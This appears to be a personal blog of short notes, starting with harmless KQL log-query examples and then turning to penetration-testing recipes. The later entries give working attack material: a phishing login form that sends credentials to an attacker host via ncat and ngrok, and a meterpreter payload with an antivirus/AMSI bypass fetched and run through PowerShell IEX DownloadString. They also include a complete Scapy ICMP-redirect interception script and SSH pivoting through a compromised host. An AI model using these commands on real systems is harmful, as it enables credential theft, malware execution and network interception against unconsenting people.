Categorieën
Count

KQL – Count

Returns the number of rows

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| count

Categorieën
Take & Limit

KQL – Take & Limit

Take takes a random amount of record from the date set

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| take 5

Limit is the same and can be used to limit the amount of records returned

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| limit 5

Categorieën
Where

KQL – Where

Where limits the result set

Search Table for data generated since a 1 hour ago

Perf
| where TimeGenerated >= ago(1h)

ago allows you to select relative date ranges

  • d – days
  • h – hours
  • m – minutes
  • s – seconds
  • ms – milliseconds
  • microsecond – microseconds

Combine where with AND statement

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0

Combine where with OR statement

Perf
| where TimeGenerated >= ago(1h)
and (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
and CounterValue > 0

Stacking where operators (useful for in between processing (if/else etc.)

Perf
| where TimeGenerated >= ago(1h)
| where (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
| where CounterValue > 0

Simulate search with where command

//Search any column for string containing Bytes

Perf
| where * has "Bytes"

//Search any column that starts with the string Bytes
Perf
| where * hasprefix "Bytes"

//Search any column that ends with the string Bytes
Perf
| where * hassuffix "Bytes"

//Search any column that contains with the string Bytes
Perf
| where * contains "Bytes"

//Search any string in a column using regex
Perf
| where InstanceName matches regex "[A-Z]:"

Categorieën
Search

KQL – Search

String search through all tables (do not use in production!)

search "memory"

Limit string search to a specific range of tables

search in (Perf, Events) "memory"

Limit string search to one table

Perf| search "memory"

Search for exact string "Available MBytes"

Perf | search CounterName == "Available MBytes"

Search for string in column that contains MBytes

Perf | search CounterName:"MBytes"

Search for string in all columns containing string Bytes

Perf | search "Bytes"

Search for string in all columns starting with Bytes

Perf | search * startswith "Bytes"

Search for string in all columns ending with Bytes

Perf | search * endswith "Bytes"

Search for string in all columns that starts with Free and ends with Bytes

Perf | search "Free*bytes"

Search for string in all columns that starts with Free and ends with Bytes that contain either C: or D:

Perf | search "Free*bytes" and ("C:" or "D:")

Search table column for string using regex

Perf
| search InstanceName matches regex "[A-Z]:"

Categorieën
wmic

Find unquoted service paths (Win)

wmic service get name,displayname,pathname,startmode | findstr /I “auto” | findstr /I /v “c:\windows\” | findstr /i /v “””

Categorieën
netcat Uncategorized

Harvest credentials

Start nectat listener

ncat -lvp 4444

Start ngrok to make url accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”http://attacker.site&#8221; method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>

login prompt

Categorieën
AV Evasion Pentest

AV Evasion Bypass ASMI

1. create MSFVENOM

msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > ‘/home/kali/http/https2.ps1’

2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass

curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1

3. python2 -m SimpleHTTPServer 80

4. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/demo.ps1&#8217;);Invoke-AlokS-AvBypass

5. IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.20.142/https2.ps1&#8217;)

Categorieën
ICMP-Redirect Attack

ICMP-Redirect Attack

Enable IP forwarding and Source NAT translation for Victim subnet

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)
#sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip- victime website = 10.23.56.100

Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
bound method IP.display of IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
bound method IP.display of IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim Ip

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
Categorieën
Uncategorized

Port Forwarding

Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host

ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117

Use Proxychain to route traffic through exploited host

ssh -D 127.0.0.1:1090 msx@192.168.68.117

Usage example nmap scan

proxychains nmap -sT -v 10.10.20.140
Categorieën
Proxychains

Proxychains

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129

proxychains nmap -sTV -n -PN -p 21 10.10.51.21